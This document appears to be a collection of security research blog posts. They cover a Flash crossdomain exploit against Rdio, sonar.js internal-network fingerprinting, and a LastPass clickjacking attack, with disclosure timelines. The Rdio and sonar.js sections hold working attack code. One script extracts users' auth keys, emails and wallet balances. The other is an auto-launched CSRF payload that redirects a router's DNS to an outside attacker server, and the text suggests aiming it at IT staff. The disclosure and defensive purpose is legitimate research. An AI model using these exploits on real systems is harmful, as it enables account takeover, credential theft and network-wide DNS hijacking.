Hey guys,

If you’ve ever pointed your DNS at an EC2 instance or another Amazon service, you might want to read this piece of research I did while working at Bishop Fox. It shows how attackers can take over your domains by drawing from Amazon’s IP pool:

http://www.bishopfox.com/blog/2015/10/fishing-the-aws-ip-pool-for-dangling-domains/

Adobe Flash is no stranger to security issues, but this post isn’t about stack overflows, bypassing ASLR, or sandbox escaping – it’s about building practical exploits against poor use of crossdomain.xml.

For those unfamiliar with cross-domain policies in Flash, check out my previous post here. I’ve also built a handy tool for testing cross-domain requests in Flash, which can be found here.

Say a site has done the unspeakable and set its cross-domain policy to a wildcard. It’s completely compromised, but now you have to write ActionScript to get a practical exploit going.

Gross. Have you ever written AS3?

To avoid ever having to write ActionScript exploits again, I’ve created FlashHTTPRequest. FlashHTTPRequest works as an easy-to-use bridge for making Flash requests from JavaScript. Instead of writing lengthy ActionScript programs, you can just write a simple line like the following:

FlashHTTPRequest.open('GET', 'http://www.rdio.com/', '', 'getAuthToken' );

The arguments are the HTTP method (GET or POST), the URL you wish to request, the request body, and finally the name of the JavaScript callback.
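
For example, a POST with a request body might look like the following sketch. The endpoint, parameters, and callback name here are hypothetical; only the four-argument signature comes from the library:

function handlePostResponse( response ) {
    // The raw response body from the Flash request lands here
    console.log( response );
}

// Hypothetical endpoint and parameters, same signature as above
FlashHTTPRequest.open( 'POST', 'http://www.example.com/api/session', 'username=test&remember=1', 'handlePostResponse' );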

You’ll notice that Rdio’s website was used in the GET example above. This is intentional, as Rdio (at the time of this draft) has a wildcard cross-domain policy:

<cross-domain-policy>
	<allow-access-from domain="*" secure="false"/>
	<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

That’s a big no-no, but it provides a great example for using FlashHTTPRequest to make a working proof of concept exploit!
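
For contrast, a sane policy whitelists only the specific domains that actually need cross-domain access. A minimal sketch (example.com is a placeholder, not a recommendation for any particular site):

<cross-domain-policy>
	<allow-access-from domain="www.example.com" secure="true"/>
</cross-domain-policy>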

To give a bit of background on how Rdio works: almost all of the information you’d need is embedded in the JavaScript of the main page. Here’s an excerpt:

Env = {
          VERSION: {"version": "9c1d79c9aaaba37f3c29ea00debd8b2af6d87637"},
          currentUser: {"productAccess": [{"mobile_devices": [{"product": "stations", "limits": ["limited_skips", "no_superhigh_bitrate", "ads", "dmca"]}], "web": [{"product": "on_demand", "limits": ["ads", "no_superhigh_bitrate"]}, {"product": "stations", "limits": ["ads", "no_superhigh_bitrate"]}], "name": "free", "ce_devices": [{"product": "stations", "limits": ["limited_skips", "no_superhigh_bitrate", "ads", "dmca"]}], "aether": [{"product": "stations", "limits": ["limited_skips", "no_superhigh_bitrate", "ads", "dmca"]}]}], "subscriptionType": 1, "has_twitter": false, "features": {"recommendations_page": true, "music_feed": true, "listenertracking_oldcountries": true, "mobile_aac_settings": true, "vdio_user_specific_hr": true, "facebook_landing_new": true, "newton_trending_network": true, "racoon_dragndrop": true, "student_discount"
...trimmed...

All user information can be found under the Env.currentUser variable, which is in the global scope of the Rdio page. So, let’s extract it!

In order to extract this information we’ll do a dirty hack. Our “getAuthToken” function looks like the following:

function getAuthToken( response ) {
    // We're going to write the response from FlashHTTPRequest into an iframe so the JavaScript will eval
    var ifrm = document.getElementById( 'rdio' );
    ifrm = (ifrm.contentWindow) ? ifrm.contentWindow : (ifrm.contentDocument.document) ? ifrm.contentDocument.document : ifrm.contentDocument;
    ifrm.document.open();
    ifrm.document.write( response );
    ifrm.document.close();
    var rdioFrame = window.frames[0].window;

    // Since the frame is now within our origin we can reference the Env variable and pull it into our current namespace
    var rdio_env = rdioFrame.Env;

    // Set the forms on the page to the extracted data
    document.getElementById( 'key' ).value = rdio_env.currentUser.authorizationKey;
    document.getElementById( 'name' ).value = rdio_env.currentUser.firstName + " " + rdio_env.currentUser.lastName;
    document.getElementById( 'email' ).value = rdio_env.currentUser.email;
    document.getElementById( 'profile_link' ).value = "http://rdio.com" + rdio_env.currentUser.url;
    document.getElementById( 'register_date' ).value = rdio_env.currentUser.registrationDate;
    document.getElementById( 'profile_image' ).src = rdio_env.currentUser.icon500;
    document.getElementById( 'wallet_amount' ).value = rdio_env.currentUser.rdioWalletAvailableBalance.amount;
    document.getElementById( 'facebook_id' ).value = "https://www.facebook.com/" + rdio_env.currentUser.facebookId;
}

The above code takes the response from FlashHTTPRequest as a parameter and writes it into an iframe on the page. This gives us a nice sandbox that won’t pollute our own namespace but still allows us to access its contents from the same origin. We then reference the frame with window.frames and pull the Env variable into our page’s namespace. Just like that, we’ve extracted all of the user info into a JavaScript object that we can manipulate however we want. The impact is easy to demonstrate, and we didn’t have to write a single line of ActionScript!

The final proof of concept can be seen below. Please note that this is for educational purposes only and should NOT be used to attack actual Rdio users:

//thehackerblog.com/rdio/

Proof of concept video:

If you’d like to build your own Flash exploit with FlashHTTPRequest, get it here!

Rdio Disclosure Timeline

  • February 26, 2015 – Initial report of the wildcard cross-domain policy sent; report was forwarded to the engineering team.
  • March 9, 2015 – I requested an update on progress, as no changes had been made to the site. Due to the high severity of the issue, I stated that I would disclose in two weeks for the safety of Rdio users.
  • March 11, 2015 – Response received stating that the cross-domain policy is working as intended and requesting more information about why it’s an issue.
  • March 12, 2015 – I responded with a much more detailed explanation of how this could be used to take over an Rdio account. They responded the same day, saying that much of the behavior is intended but that the authorizationKey value being extracted is definitely a security issue. They stated the issue was high priority and that a fix would land within a few days.
  • March 24, 2015 – The site is still vulnerable; I request an update on progress (ignored).
  • September 22, 2015 – Given up on responsible disclosure.

For archival purposes I’m posting this talk that Mike Brooks (a.k.a. Rook) and I gave at Black Hat USA 2015. While we danced around the vendor in the talk description, we can now disclose that the vendor was indeed Akamai – see their blog post about the issue here. Luckily, Akamai was super helpful throughout the whole process (which is more than can be said for many vendors!). If any of you find other vulnerabilities in Akamai, hit them up at [email protected]. This vulnerability chain allowed us to achieve a full Same-Origin Policy bypass on many of the internet’s most popular sites (Facebook, Verizon, Microsoft, etc.).

“It is unlikely for a bug to affect almost every CDN and render it vulnerable, but when this happens the possibilities are endless and potentially disastrous.

Imagine – a Facebook worm giving an attacker full access to your bank account completely unbeknownst to you, until seven Bentleys, plane tickets for a herd of llamas, a mink coat once owned by P. Diddy, and a single monster cable all show up on your next statement. What a nightmare.

But in all seriousness, thousands of websites relying on the most popular CDNs are at risk. While some application requirements may need a security bypass in order to work, these intentional bypasses can become a valuable link in an exploit chain. Our research has unveiled a collection of general attack patterns that can be used against the infrastructure that supports high availability websites.

This is a story of exploit development with fascinating consequences.”

Click here for the talk slides.

Recently, WebRTC has been in the news as a way to scan internal networks using a regular webpage. We’ve seen some interesting uses of this functionality, such as The New York Times scanning your internal network to detect bots. The idea of a random webpage on the internet being able to scan your internal network for live hosts is a scary one. What could an attacker do with a list of live hosts on your internal network? It gets a bit scarier once you’ve experienced pentesting an internal network. Many internal networks are cluttered with devices stocked with default credentials, lists of CVEs that would make Metasploitable look secure, and forgotten devices that were plugged in never to be configured. Yet despite WebRTC being a scary feature of many browsers, I haven’t seen any framework for developing exploits using it.
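
For context, the internal-network discovery that makes all of this possible rests on a well-known WebRTC behavior: host ICE candidates leak the machine’s internal IP address. A minimal sketch of that leak as it worked in browsers of this era follows (this is not sonar.js’s code, and modern browsers have since masked host candidates with mDNS names):

// Prefixed constructors were still common at the time
var RTCPC = window.RTCPeerConnection || window.webkitRTCPeerConnection || window.mozRTCPeerConnection;
var pc = new RTCPC( { iceServers: [] } );

// Creating a data channel is enough to kick off ICE candidate gathering
pc.createDataChannel( '' );

pc.onicecandidate = function( event ) {
    if ( !event.candidate ) return;
    // Host candidates embed the machine's internal IP address
    var match = /(\d{1,3}(?:\.\d{1,3}){3})/.exec( event.candidate.candidate );
    if ( match ) console.log( 'Internal IP: ' + match[1] );
};

// Callback-style createOffer, as used in browsers of this era
pc.createOffer( function( offer ) {
    pc.setLocalDescription( offer );
}, function( error ) {} );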

Introducing sonar.js

In response, I built sonar.js, a framework that uses JavaScript, WebRTC, and some onload hackery to detect internal devices on a network. sonar.js works by utilizing WebRTC to enumerate live hosts on the internal network. Upon enumerating a live IP, sonar.js attempts to link to static resources such as CSS, images, and JavaScript while hooking the onload event handler. If a resource loads successfully and triggers the onload event, then we know the host serves that resource. Why is this useful to know? By getting a list of resources hosted on a device, we can attempt to fingerprint what that device is. For example, a Linksys WRT54G router has the following static resources:

  • /UILinksys.gif
  • /UI_10.gif
  • /UI_07.gif
  • /UI_06.gif
  • /UI_03.gif
  • /UI_02.gif
  • /UI_Cisco.gif
  • /style.css

So, if we embed all of these resources on our page and each one triggers a successful onload event, we can be fairly certain the device is indeed a Linksys WRT54G router. sonar.js automates this process and allows penetration testers to build a list of custom exploits for a range of devices; if a device is detected via the methodology above, the appropriate exploit is launched.
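
To make the probing concrete, here’s a minimal sketch of the onload trick. This is not sonar.js’s actual implementation – it only handles image resources, and the target IP and resource list are illustrative:

function probeHost( ip, resources, onMatch ) {
    // Attempt to load every known resource from the candidate host; if all
    // of them fire onload, the device matches the fingerprint
    var loaded = 0;
    resources.forEach( function( path ) {
        var img = new Image();
        img.onload = function() {
            loaded++;
            if ( loaded === resources.length ) {
                onMatch( ip );
            }
        };
        // A failed load simply means this host doesn't match; nothing to do
        img.src = 'http://' + ip + path;
    });
}

// Example: check a WebRTC-discovered host against two of the image
// resources listed above
probeHost( '192.168.1.1', [ '/UILinksys.gif', '/UI_Cisco.gif' ], function( ip ) {
    console.log( 'Likely a Linksys WRT54G at ' + ip );
});

Image objects fire onload across origins, which is exactly the side channel that makes this fingerprinting possible.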

Building an Exploit With sonar.js

Now that you know how sonar.js works, let’s build a working proof of concept with it. For this exercise, we’ll attempt to re-route all DNS requests on an internal network to our own malicious DNS server. Since all of the clients on the network get their DNS settings from the router via DHCP, we’ll have to compromise the router itself. In a real attack you would have pre-packaged exploits for many different router models, but we’re just going to build one for the popular ASUS RT-N66U WiFi router. Luckily for us, the RT-N66U has no Cross-Site Request Forgery (CSRF) protection, so we can forge requests on behalf of anyone authenticated to the router. The following is an example request to change the router’s default DNS server setting (this is the DNS server distributed to all clients on the network):

POST /start_apply.htm HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/Advanced_DHCP_Content.asp
Cookie: apps_last=; dm_install=no; dm_enable=no
Authorization: [REDACTED]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 519

productid=RT-N66U&current_page=Advanced_DHCP_Content.asp&next_page=Advanced_GWStaticRoute_Content.asp&next_host=192.168.1.1&modified=0&action_mode=apply&action_wait=30&action_script=restart_net_and_phy&first_time=&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&dhcp_staticlist=&dhcp_enable_x=1&lan_domain=&dhcp_start=192.168.1.2&dhcp_end=192.168.1.254&dhcp_lease=86400&dhcp_gateway_x=&dhcp_dns1_x=8.8.8.8&dhcp_wins_x=&dhcp_static_x=0&dhcp_staticmac_x_0=&dhcp_staticip_x_0=&FAQ_input=

Because the above request contains no CSRF tokens and the router performs no Referer checks, we can force an authenticated user’s browser to perform it. Those using Burp Suite Professional can generate a proof of concept by right-clicking the request, choosing “Engagement Tools”, and clicking “Generate CSRF PoC”. An example proof-of-concept script can be seen below:

var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.1.1/start_apply.htm", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// Send the victim's session cookies / HTTP auth along with the forged request
xhr.withCredentials = true;
var body = "productid=RT-N66U&current_page=Advanced_DHCP_Content.asp&next_page=Advanced_GWStaticRoute_Content.asp&next_host=192.168.1.1&modified=0&action_mode=apply&action_wait=30&action_script=restart_net_and_phy&first_time=&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&dhcp_staticlist=&dhcp_enable_x=1&lan_domain=&dhcp_start=192.168.1.2&dhcp_end=192.168.1.254&dhcp_lease=86400&dhcp_gateway_x=&dhcp_dns1_x=8.8.8.8&dhcp_wins_x=&dhcp_static_x=0&dhcp_staticmac_x_0=&dhcp_staticip_x_0=&FAQ_input=";
// Convert the body to raw bytes and send it as a Blob so the exact byte
// sequence is preserved on the wire
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
  aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));

We now have an exploit for our target router – so how do we integrate it into sonar.js? To start, we need to create a sonar.js fingerprint; the following code snippet shows the format:

var fingerprints = [
    {
        'name': "ASUS RT-N66U",
        'fingerprints': ["/images/New_ui/asustitle.png","/images/loading.gif","/images/alertImg.png","/images/New_ui/networkmap/line_one.png","/images/New_ui/networkmap/lock.png","/images/New_ui/networkmap/line_two.png","/index_style.css","/form_style.css","/NM_style.css","/other.css"],
        'callback': function( ip ) {
            // Exploit code here
        },
    },
]

Since creating a fingerprint by hand can be a pain, I’ve also created a Chrome extension that will generate one based on the page you’re currently on. It’s available here:

https://chrome.google.com/webstore/detail/sonar-fingerprint-generat/pmijnndljolchjlfcncaeoejfpjjagef

[Image: the sonar.js fingerprint generator Chrome extension]

As discussed above, sonar.js works by linking to static resources on a host in order to enumerate it. The fingerprints field of the JavaScript object contains an array of static resources known to exist on every ASUS RT-N66U router. For example, we know that the image /images/New_ui/asustitle.png is part of the main menu of the RT-N66U web UI. Upon enumerating an IP address, sonar.js will attempt to link to the above resources while hooking the onload event handler to check whether they loaded successfully. If all of the above resources load successfully, sonar.js will call the callback( ip ) function to launch the exploit. So, with a small modification to our earlier exploit, we have a fully working sonar.js payload:

var fingerprints = [
    {
        'name': "ASUS RT-N66U",
        'fingerprints': ["/images/New_ui/asustitle.png","/images/loading.gif","/images/alertImg.png","/images/New_ui/networkmap/line_one.png","/images/New_ui/networkmap/lock.png","/images/New_ui/networkmap/line_two.png","/index_style.css","/form_style.css","/NM_style.css","/other.css"],
        'callback': function( ip ) {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http://" + ip + "/start_apply.htm", true);
            xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
            xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            xhr.withCredentials = true;
            var body = "productid=RT-N66U&current_page=Advanced_DHCP_Content.asp&next_page=Advanced_GWStaticRoute_Content.asp&next_host=" + ip + "&modified=0&action_mode=apply&action_wait=30&action_script=restart_net_and_phy&first_time=&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=" + ip + "&lan_netmask=255.255.255.0&dhcp_staticlist=&dhcp_enable_x=1&lan_domain=&dhcp_start=192.168.1.2&dhcp_end=192.168.1.254&dhcp_lease=86400&dhcp_gateway_x=&dhcp_dns1_x=23.92.52.47&dhcp_wins_x=&dhcp_static_x=0&dhcp_staticmac_x_0=&dhcp_staticip_x_0=&FAQ_input=";
            var aBody = new Uint8Array(body.length);
            for (var i = 0; i < aBody.length; i++)
              aBody[i] = body.charCodeAt(i); 
            xhr.send(new Blob([aBody]));
        },
    },
]

We then load this fingerprint database into sonar.js:

<!DOCTYPE html>
<html>
    <head>
    </head>
    <body>
        <script src="sonar.js"></script>
        <script src="fingerprint_db.js"></script>
        <script>
            // Sonar.js loading a fingerprint database from fingerprint_db.js
            sonar.load_fingerprints( fingerprints );
            sonar.start();
        </script>
    </body>
</html>

Now we have a working exploit! The next step is to deliver the payload to our victim. It would be beneficial to target users likely to have router access, such as IT staff or system administrators. Once a victim clicks a link to the sonar.js payload page, their internal network is scanned for an ASUS RT-N66U router, and if one is found the exploit is launched against it.

To show an example of this payload in action, see the following video:

As you can see, we’ve hijacked all DNS requests on the internal network due to a simple cross-site request forgery vulnerability in the RT-N66U router. With control over the network’s DNS, we can redirect requests for sites like http://legitbank.com to a phishing page. Suffice it to say, when you control DNS the game is pretty much over.

The sonar.js Project

We can now build exploits against a range of devices, and sonar.js will help us deliver them to internal networks. Currently, the sonar.js fingerprint database is limited, with only a handful of fingerprints for a few devices. We need your help expanding it! For more information on generating fingerprints and building exploits with sonar.js, see the following GitHub project:

https://github.com/mandatoryprogrammer/sonar.js

LastPass, a popular password management service with addons for Firefox, Chrome, and Internet Explorer, suffered from a clickjacking vulnerability that can be exploited on sites lacking proper X-Frame-Options headers to steal passwords. The password auto-fill dialogue can be overlaid with a deceptive page to trick users into copying and then pasting their password into an attacker’s site.

Update: After disclosing to the LastPass folks via their support system and getting a very quick and helpful response, this issue is now fixed in the latest versions of LastPass for Chrome and Internet Explorer. Kudos to the LastPass guys for patching so quickly! The only patch not yet available is for Mozilla Firefox, due to Mozilla’s unwillingness to approve the update in a reasonable amount of time. See below for full details.

For the proof-of-concept example we’ll use Tumblr, which relies on JavaScript to prevent clickjacking. The protection is ineffective, however, as the site can be framed with an HTML5 sandboxed iframe that prevents the page from executing JavaScript:

[Image: Tumblr’s login page framed with its JavaScript frame-busting blocked]
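
The framing trick itself is just an HTML5 sandboxed iframe with scripts disallowed – a minimal sketch (the exact attributes used in the PoC may differ):

<!-- Without 'allow-scripts' in the sandbox list, the framed page's JavaScript
     (including its frame-busting code) never runs; 'allow-forms' keeps the
     login form usable so the password manager can still auto-fill it -->
<iframe sandbox="allow-forms" src="https://www.tumblr.com/login"></iframe>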

While the page is prevented from running JavaScript, the LastPass addon is still able to add its auto-fill functionality to the Tumblr login form. Since the page can be iframed, we can overlay an entire page on top of it to redress the UI and trick the user into clicking through the LastPass dialogues. The following image shows the UI redressed to look like a CAPTCHA check against bots:

[Image: the clickjacking proof of concept disguised as a CAPTCHA check]
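
The redressing is the classic clickjacking overlay: an invisible iframe stacked above decoy UI so that clicks and copy operations land in the frame. A minimal sketch of that general pattern follows (the offsets and markup are illustrative, not the actual PoC):

<style>
    /* The decoy "CAPTCHA" page the victim believes they're interacting with */
    #decoy { position: absolute; top: 0; left: 0; z-index: 1; }

    /* The framed login page, positioned so the LastPass auto-fill UI lines up
       underneath the decoy buttons, and made invisible to the victim */
    #target {
        position: absolute;
        top: 120px;   /* illustrative offsets - tuned per target in practice */
        left: 80px;
        opacity: 0;
        z-index: 2;   /* sits on top, so clicks land in the frame */
    }
</style>

<div id="decoy">
    <p>Please copy the agreement text, then click the buttons in order.</p>
    <button>One</button> <button>Two</button> <button>Three</button>
</div>

<iframe id="target" sandbox="allow-forms" src="https://www.tumblr.com/login"></iframe>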

The user is prompted to copy the agreement text, then to click some “randomized buttons”, before being asked to paste the agreement text back into a text box. What the user is unaware of is that clicking button number three actually copies their LastPass-stored Tumblr password. When the user goes to paste the agreement text back into the website, they are inadvertently giving their password away to the attacker’s site:

[Image: the copied password pasted into the attacker’s page]

The trickery becomes obvious when the overlay is made slightly transparent:

[Image: the overlay made partially transparent, revealing the framed Tumblr login underneath]

If you’d like to test this out yourself, try the following link (please note this only works with the Chrome version of LastPass):

thehackerblog.com/lastpass/

EDIT: The above link no longer works, as LastPass has pushed a fix.

It goes without saying, but the script does not actually log your Tumblr password – though you shouldn’t take my word for it.

A video demonstrating the vulnerability is also available here:

Websites can protect themselves by simply sending an X-Frame-Options: SAMEORIGIN header.
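
On the wire, that just means every sensitive page’s response carries the header – a sketch:

HTTP/1.1 200 OK
Content-Type: text/html
X-Frame-Options: SAMEORIGIN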

It would be trivial to build this exploit for other websites. Please keep in mind that Tumblr has little to do with this issue – they are just the example; the core of the problem was with LastPass itself.

Disclosure Timeline

  • April 3, 2015 – Issue reported via the LastPass ticket system.
  • April 4, 2015 – LastPass responds confirming the issue and says they will work on remediation (we also sort out a mistake in the link I sent them demonstrating the issue).
  • April 20, 2015 – Patch implemented internally for testing before being pushed to production.
  • April 22, 2015 – Patch pushed to the Chrome extension; patches for the other browsers are in the works.
  • July 1, 2015 – Mozilla has still not pushed out the patch despite LastPass submitting it on April 22nd.

The scariest part of this vulnerability has been the fact that Mozilla has had the patch under review for months and still hasn’t approved it. It’s worrying to think that security updates for Mozilla addons can take months to reach users. It’s definitely changed my view of Firefox from a security perspective.

EDIT: I talked with someone who reviews addons for Mozilla, and they shed some light on why the review took so long. It appears the update was much more than just a fix for the clickjacking issue, and LastPass’s minified code took a while to review. Additionally, it appears the urgency of the patch wasn’t clearly communicated to the Mozilla team. I apologize for the polarized view of the addon review process (a process I’m admittedly unfamiliar with). Overall, it was a very nice explanation and provided good insight into the inner workings of that process.

Until next time,

-mandatory